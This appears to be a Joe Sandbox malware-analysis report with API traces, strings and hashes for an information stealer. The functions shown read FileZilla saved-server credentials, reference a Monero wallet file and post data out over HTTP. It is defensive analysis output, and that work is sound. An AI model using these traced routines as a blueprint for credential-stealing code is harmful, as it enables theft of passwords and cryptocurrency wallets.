GetProcAddress.KERNEL32(74DD0000,00D4D1D0), ref: 00269F81
GetProcAddress.KERNEL32(74DD0000,00D359B0), ref: 00269F99
GetProcAddress.KERNEL32(74DD0000,00D4D2F0), ref: 00269FB1
GetProcAddress.KERNEL32(74DD0000,00D359D0), ref: 00269FCA
GetProcAddress.KERNEL32(74DD0000,00D4D218), ref: 00269FE2
GetProcAddress.KERNEL32(74DD0000,00D4D2C0), ref: 00269FFA
GetProcAddress.KERNEL32(74DD0000,00D359F0), ref: 0026A013
GetProcAddress.KERNEL32(74DD0000,00D35B10), ref: 0026A02B
LoadLibraryA.KERNEL32(00D4D0F8,?,00265CA3,00270AEB,?,?,?,?,?,?,?,?,?,?,00270AEA,00270AE3), ref: 0026A03D
LoadLibraryA.KERNEL32(00D4D2D8,?,00265CA3,00270AEB,?,?,?,?,?,?,?,?,?,?,00270AEA,00270AE3), ref: 0026A04E
LoadLibraryA.KERNEL32(00D4D170,?,00265CA3,00270AEB,?,?,?,?,?,?,?,?,?,?,00270AEA,00270AE3), ref: 0026A060
LoadLibraryA.KERNEL32(00D4D230,?,00265CA3,00270AEB,?,?,?,?,?,?,?,?,?,?,00270AEA,00270AE3), ref: 0026A072
LoadLibraryA.KERNEL32(00D4D308,?,00265CA3,00270AEB,?,?,?,?,?,?,?,?,?,?,00270AEA,00270AE3), ref: 0026A083
LoadLibraryA.KERNEL32(00D4D1A0,?,00265CA3,00270AEB,?,?,?,?,?,?,?,?,?,?,00270AEA,00270AE3), ref: 0026A095
LoadLibraryA.KERNEL32(00D4D320,?,00265CA3,00270AEB,?,?,?,?,?,?,?,?,?,?,00270AEA,00270AE3), ref: 0026A0A7
LoadLibraryA.KERNEL32(00D4D350,?,00265CA3,00270AEB,?,?,?,?,?,?,?,?,?,?,00270AEA,00270AE3), ref: 0026A0B8
GetProcAddress.KERNEL32(75290000,00D35CD0), ref: 0026A0DA
GetProcAddress.KERNEL32(75290000,00D4D458), ref: 0026A0F2
GetProcAddress.KERNEL32(75290000,00D49128), ref: 0026A10A
GetProcAddress.KERNEL32(75290000,00D4D530), ref: 0026A123
GetProcAddress.KERNEL32(75290000,00D35CF0), ref: 0026A13B
GetProcAddress.KERNEL32(734C0000,00D3B7C0), ref: 0026A160
GetProcAddress.KERNEL32(734C0000,00D35E10), ref: 0026A179
GetProcAddress.KERNEL32(734C0000,00D3B798), ref: 0026A191
GetProcAddress.KERNEL32(734C0000,00D4D500), ref: 0026A1A9
GetProcAddress.KERNEL32(734C0000,00D4D548), ref: 0026A1C2
GetProcAddress.KERNEL32(734C0000,00D35E50), ref: 0026A1DA
GetProcAddress.KERNEL32(734C0000,00D35C10), ref: 0026A1F2
GetProcAddress.KERNEL32(734C0000,00D4D410), ref: 0026A20B
GetProcAddress.KERNEL32(752C0000,00D35E30), ref: 0026A22C
GetProcAddress.KERNEL32(752C0000,00D35B90), ref: 0026A244
GetProcAddress.KERNEL32(752C0000,00D4D488), ref: 0026A25D
GetProcAddress.KERNEL32(752C0000,00D4D4E8), ref: 0026A275
GetProcAddress.KERNEL32(752C0000,00D35D10), ref: 0026A28D
GetProcAddress.KERNEL32(74EC0000,00D3B900), ref: 0026A2B3
GetProcAddress.KERNEL32(74EC0000,00D3BA40), ref: 0026A2CB
GetProcAddress.KERNEL32(74EC0000,00D4D470), ref: 0026A2E3
GetProcAddress.KERNEL32(74EC0000,00D35C30), ref: 0026A2FC
GetProcAddress.KERNEL32(74EC0000,00D35B30), ref: 0026A314
GetProcAddress.KERNEL32(74EC0000,00D3BAB8), ref: 0026A32C
GetProcAddress.KERNEL32(75BD0000,00D4D4D0), ref: 0026A352
GetProcAddress.KERNEL32(75BD0000,00D35C70), ref: 0026A36A
GetProcAddress.KERNEL32(75BD0000,00D49188), ref: 0026A382
GetProcAddress.KERNEL32(75BD0000,00D4D578), ref: 0026A39B
GetProcAddress.KERNEL32(75BD0000,00D4D5A8), ref: 0026A3B3
GetProcAddress.KERNEL32(75BD0000,00D35B50), ref: 0026A3CB
GetProcAddress.KERNEL32(75BD0000,00D35B70), ref: 0026A3E4
GetProcAddress.KERNEL32(75BD0000,00D4D590), ref: 0026A3FC
GetProcAddress.KERNEL32(75BD0000,00D4D4A0), ref: 0026A414
GetProcAddress.KERNEL32(75A70000,00D35DD0), ref: 0026A436
GetProcAddress.KERNEL32(75A70000,00D4D3F8), ref: 0026A44E
GetProcAddress.KERNEL32(75A70000,00D4D428), ref: 0026A466
GetProcAddress.KERNEL32(75A70000,00D4D4B8), ref: 0026A47F
GetProcAddress.KERNEL32(75A70000,00D4D440), ref: 0026A497
GetProcAddress.KERNEL32(75450000,00D35D30), ref: 0026A4B8
GetProcAddress.KERNEL32(75450000,00D35BB0), ref: 0026A4D1
GetProcAddress.KERNEL32(75DA0000,00D35D50), ref: 0026A4F2
GetProcAddress.KERNEL32(75DA0000,00D4D518), ref: 0026A50A
GetProcAddress.KERNEL32(6F070000,00D35DB0), ref: 0026A530
GetProcAddress.KERNEL32(6F070000,00D35BD0), ref: 0026A548
GetProcAddress.KERNEL32(6F070000,00D35BF0), ref: 0026A560
GetProcAddress.KERNEL32(6F070000,00D4D560), ref: 0026A579
GetProcAddress.KERNEL32(6F070000,00D35C50), ref: 0026A591
GetProcAddress.KERNEL32(6F070000,00D35C90), ref: 0026A5A9
GetProcAddress.KERNEL32(6F070000,00D35CB0), ref: 0026A5C2
GetProcAddress.KERNEL32(6F070000,00D35D70), ref: 0026A5DA
GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 0026A5F1
GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 0026A607
GetProcAddress.KERNEL32(75AF0000,00D4CFD8), ref: 0026A629
GetProcAddress.KERNEL32(75AF0000,00D491E8), ref: 0026A641
GetProcAddress.KERNEL32(75AF0000,00D4D0B0), ref: 0026A659
GetProcAddress.KERNEL32(75AF0000,00D4D080), ref: 0026A672
GetProcAddress.KERNEL32(75D90000,00D35AB0), ref: 0026A693
GetProcAddress.KERNEL32(6F9D0000,00D4CE10), ref: 0026A6B4
GetProcAddress.KERNEL32(6F9D0000,00D35AD0), ref: 0026A6CD
GetProcAddress.KERNEL32(6F9D0000,00D4CF78), ref: 0026A6E5
GetProcAddress.KERNEL32(6F9D0000,00D4CED0), ref: 0026A6FD

Strings

HttpQueryInfoA, xrefs: 0026A5FC
InternetSetOptionA, xrefs: 0026A5E5

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: HttpQueryInfoA$InternetSetOptionA
API String ID: 2238633743-1775429166
Opcode ID: 35f0dcfb1328a3b5bb723f46e7e10ddea4e8cb2fb4978d24e8908617b9fafb99
Instruction ID: 4189cd9ea4312ec1075b8d7f6ac117d982ae3708c9cabbe569090ac32e593e6d
Opcode Fuzzy Hash: 35f0dcfb1328a3b5bb723f46e7e10ddea4e8cb2fb4978d24e8908617b9fafb99
Instruction Fuzzy Hash: 2B624EB5510200AFC344EFA9ED8A96677F9F7AC301724857BA609C3234D7399861CFDA

Function 00257710 Relevance: 81.6, APIs: 54, Instructions: 584
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00257724
RtlAllocateHeap.NTDLL(00000000), ref: 0025772B
lstrcat.KERNEL32(?,00D49C80), ref: 002578DB
lstrcat.KERNEL32(?,?), ref: 002578EF
lstrcat.KERNEL32(?,?), ref: 00257903
lstrcat.KERNEL32(?,?), ref: 00257917
lstrcat.KERNEL32(?,00D4E470), ref: 0025792B
lstrcat.KERNEL32(?,00D4E548), ref: 0025793F
lstrcat.KERNEL32(?,00D4E530), ref: 00257952
lstrcat.KERNEL32(?,00D4E578), ref: 00257966
lstrcat.KERNEL32(?,00D49D08), ref: 0025797A
lstrcat.KERNEL32(?,?), ref: 0025798E
lstrcat.KERNEL32(?,?), ref: 002579A2
lstrcat.KERNEL32(?,?), ref: 002579B6
lstrcat.KERNEL32(?,00D4E470), ref: 002579C9
lstrcat.KERNEL32(?,00D4E548), ref: 002579DD
lstrcat.KERNEL32(?,00D4E530), ref: 002579F1
lstrcat.KERNEL32(?,00D4E578), ref: 00257A04
lstrcat.KERNEL32(?,00D49D70), ref: 00257A18
lstrcat.KERNEL32(?,?), ref: 00257A2C
lstrcat.KERNEL32(?,?), ref: 00257A40
lstrcat.KERNEL32(?,?), ref: 00257A54
lstrcat.KERNEL32(?,00D4E470), ref: 00257A68
lstrcat.KERNEL32(?,00D4E548), ref: 00257A7B
lstrcat.KERNEL32(?,00D4E530), ref: 00257A8F
lstrcat.KERNEL32(?,00D4E578), ref: 00257AA3
lstrcat.KERNEL32(?,00D49DD8), ref: 00257AB6
lstrcat.KERNEL32(?,?), ref: 00257ACA
lstrcat.KERNEL32(?,?), ref: 00257ADE
lstrcat.KERNEL32(?,?), ref: 00257AF2
lstrcat.KERNEL32(?,00D4E470), ref: 00257B06
lstrcat.KERNEL32(?,00D4E548), ref: 00257B1A
lstrcat.KERNEL32(?,00D4E530), ref: 00257B2D
lstrcat.KERNEL32(?,00D4E578), ref: 00257B41
lstrcat.KERNEL32(?,00D4E648), ref: 00257B55
lstrcat.KERNEL32(?,?), ref: 00257B69
lstrcat.KERNEL32(?,?), ref: 00257B7D
lstrcat.KERNEL32(?,?), ref: 00257B91
lstrcat.KERNEL32(?,00D4E470), ref: 00257BA4
lstrcat.KERNEL32(?,00D4E548), ref: 00257BB8
lstrcat.KERNEL32(?,00D4E530), ref: 00257BCC
lstrcat.KERNEL32(?,00D4E578), ref: 00257BDF
lstrcat.KERNEL32(?,00D4E6B0), ref: 00257BF3
lstrcat.KERNEL32(?,?), ref: 00257C07
lstrcat.KERNEL32(?,?), ref: 00257C1B
lstrcat.KERNEL32(?,?), ref: 00257C2F
lstrcat.KERNEL32(?,00D4E470), ref: 00257C43
lstrcat.KERNEL32(?,00D4E548), ref: 00257C56
lstrcat.KERNEL32(?,00D4E530), ref: 00257C6A
lstrcat.KERNEL32(?,00D4E578), ref: 00257C7E

Part of subcall function 002575D0: lstrcat.KERNEL32(2F4D5020,002717FC), ref: 00257606
Part of subcall function 002575D0: lstrcat.KERNEL32(2F4D5020,00000000), ref: 00257648
Part of subcall function 002575D0: lstrcat.KERNEL32(2F4D5020, : ), ref: 0025765A
Part of subcall function 002575D0: lstrcat.KERNEL32(2F4D5020,00000000), ref: 0025768F
Part of subcall function 002575D0: lstrcat.KERNEL32(2F4D5020,00271804), ref: 002576A0
Part of subcall function 002575D0: lstrcat.KERNEL32(2F4D5020,00000000), ref: 002576D3
Part of subcall function 002575D0: lstrcat.KERNEL32(2F4D5020,00271808), ref: 002576ED
Part of subcall function 002575D0: task.LIBCPMTD ref: 002576FB

lstrcat.KERNEL32(?,00D4E948), ref: 00257E0B
lstrcat.KERNEL32(?,00D4D700), ref: 00257E1E
lstrlen.KERNEL32(2F4D5020), ref: 00257E2B
lstrlen.KERNEL32(2F4D5020), ref: 00257E3B

Part of subcall function 0026A740: lstrcpy.KERNEL32(00270E17,00000000), ref: 0026A788

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Heaplstrlen$AllocateProcesslstrcpytask
String ID:
API String ID: 928082926-0
Opcode ID: b8275cf7def7207d2b58d3c250169d024fa30751f7219811fdd221a9db71bdd9
Instruction ID: e07c80da74a3ddd191a7888ae5ef687abab94311dca882155ca08eacaa09b1cc
Opcode Fuzzy Hash: b8275cf7def7207d2b58d3c250169d024fa30751f7219811fdd221a9db71bdd9
Instruction Fuzzy Hash: 273240B2C20314ABCB15FBA0DC85DEA737CBB54700F444AA9F60962190EE74E799CF95

Function 00260250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0026A740: lstrcpy.KERNEL32(00270E17,00000000), ref: 0026A788

Part of subcall function 00268DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00268E0B

Part of subcall function 0026A920: lstrcpy.KERNEL32(00000000,?), ref: 0026A972
Part of subcall function 0026A920: lstrcat.KERNEL32(00000000), ref: 0026A982

Part of subcall function 0026A8A0: lstrcpy.KERNEL32(?,00270E17), ref: 0026A905

Part of subcall function 0026A9B0: lstrlen.KERNEL32(?,00D49078,?,\Monero\wallet.keys,00270E17), ref: 0026A9C5
Part of subcall function 0026A9B0: lstrcpy.KERNEL32(00000000), ref: 0026AA04
Part of subcall function 0026A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0026AA12

Part of subcall function 0026A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0026A7E6

Part of subcall function 002599C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002599EC
Part of subcall function 002599C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00259A11
Part of subcall function 002599C0: LocalAlloc.KERNEL32(00000040,?), ref: 00259A31
Part of subcall function 002599C0: ReadFile.KERNEL32(000000FF,?,00000000,0025148F,00000000), ref: 00259A5A
Part of subcall function 002599C0: LocalFree.KERNEL32(0025148F), ref: 00259A90
Part of subcall function 002599C0: CloseHandle.KERNEL32(000000FF), ref: 00259A9A

Part of subcall function 00268E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00268E52

GetProcessHeap.KERNEL32(00000000,000F423F,00270DBA,00270DB7,00270DB6,00270DB3), ref: 00260362
RtlAllocateHeap.NTDLL(00000000), ref: 00260369
StrStrA.SHLWAPI(00000000,<Host>), ref: 00260385
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00270DB2), ref: 00260393
StrStrA.SHLWAPI(00000000,<Port>), ref: 002603CF
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00270DB2), ref: 002603DD
StrStrA.SHLWAPI(00000000,<User>), ref: 00260419
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00270DB2), ref: 00260427
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00260463
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00270DB2), ref: 00260475
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00270DB2), ref: 00260502
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00270DB2), ref: 0026051A
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00270DB2), ref: 00260532
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00270DB2), ref: 0026054A
lstrcat.KERNEL32(?,browser: FileZilla), ref: 00260562
lstrcat.KERNEL32(?,profile: null), ref: 00260571
lstrcat.KERNEL32(?,url: ), ref: 00260580
lstrcat.KERNEL32(?,00000000), ref: 00260593
lstrcat.KERNEL32(?,00271678), ref: 002605A2
lstrcat.KERNEL32(?,00000000), ref: 002605B5
lstrcat.KERNEL32(?,0027167C), ref: 002605C4
lstrcat.KERNEL32(?,login: ), ref: 002605D3
lstrcat.KERNEL32(?,00000000), ref: 002605E6
lstrcat.KERNEL32(?,00271688), ref: 002605F5
lstrcat.KERNEL32(?,password: ), ref: 00260604
lstrcat.KERNEL32(?,00000000), ref: 00260617
lstrcat.KERNEL32(?,00271698), ref: 00260626
lstrcat.KERNEL32(?,0027169C), ref: 00260635
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00270DB2), ref: 0026068E

Strings

<Port>, xrefs: 002603C6
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 002602A4
password: , xrefs: 002605FB
browser: FileZilla, xrefs: 00260559
<User>, xrefs: 00260410
login: , xrefs: 002605CA
url: , xrefs: 00260577
profile: null, xrefs: 00260568
<Pass encoding="base64">, xrefs: 0026045A
<Host>, xrefs: 0026037C

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
API String ID: 1942843190-555421843
Opcode ID: 817ef237e4e5c26556b55d28e3b640b46fe7319ecbc3658bd7ba3669b86d4a2a
Instruction ID: 95c4de52af928c5c33808aab87ee554d82b38e1e17d4ed45ee80ed3dca1ea17b
Opcode Fuzzy Hash: 817ef237e4e5c26556b55d28e3b640b46fe7319ecbc3658bd7ba3669b86d4a2a
Instruction Fuzzy Hash: 5FD100719201089BCB04FBE4DD96DEE7378EF54300F508529F506B7091DE74AAA9CFA6

Function 00255100 Relevance: 47.8, APIs: 19, Strings: 8, Instructions: 572
stringnetworkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0026A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0026A7E6

Part of subcall function 002547B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00254839
Part of subcall function 002547B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00254849

lstrlen.KERNEL32(00000000), ref: 00255193

Part of subcall function 00268EA0: CryptBinaryToStringA.CRYPT32(00000000,00255184,40000001,00000000,00000000,?,00255184), ref: 00268EC0

Part of subcall function 0026A740: lstrcpy.KERNEL32(00270E17,00000000), ref: 0026A788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00255207
StrCmpCA.SHLWAPI(?,00D4EAC8), ref: 00255225
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00255340
HttpOpenRequestA.WININET(00000000,00D4EAD8,?,00D4DEA0,00000000,00000000,00400100,00000000), ref: 002553A4

Part of subcall function 0026A9B0: lstrlen.KERNEL32(?,00D49078,?,\Monero\wallet.keys,00270E17), ref: 0026A9C5
Part of subcall function 0026A9B0: lstrcpy.KERNEL32(00000000), ref: 0026AA04
Part of subcall function 0026A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0026AA12

Part of subcall function 0026A8A0: lstrcpy.KERNEL32(?,00270E17), ref: 0026A905

Part of subcall function 0026A920: lstrcpy.KERNEL32(00000000,?), ref: 0026A972
Part of subcall function 0026A920: lstrcat.KERNEL32(00000000), ref: 0026A982

lstrlen.KERNEL32(00000000,00000000,?,",00000000,?,00D4EA18,00000000,?,00D4A3C0,00000000,?,002719DC,00000000,?,002651CF), ref: 00255737
lstrlen.KERNEL32(00000000), ref: 0025574B
GetProcessHeap.KERNEL32(00000000,?), ref: 0025575C
RtlAllocateHeap.NTDLL(00000000), ref: 00255763
lstrlen.KERNEL32(00000000), ref: 00255778
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 002557A9
lstrlen.KERNEL32(00000000), ref: 002557C8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 002557E1
lstrlen.KERNEL32(00000000,?,?), ref: 0025580E
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00255822
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0025584D
InternetCloseHandle.WININET(00000000), ref: 002558B1
InternetCloseHandle.WININET(00000000), ref: 002558BE
InternetCloseHandle.WININET(00000000), ref: 002558C8

Strings

------, xrefs: 002553B7
------, xrefs: 002554F9
", xrefs: 00255482
", xrefs: 002555C4
------, xrefs: 00255297
", xrefs: 00255706
------, xrefs: 0025563B
--, xrefs: 00255280

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
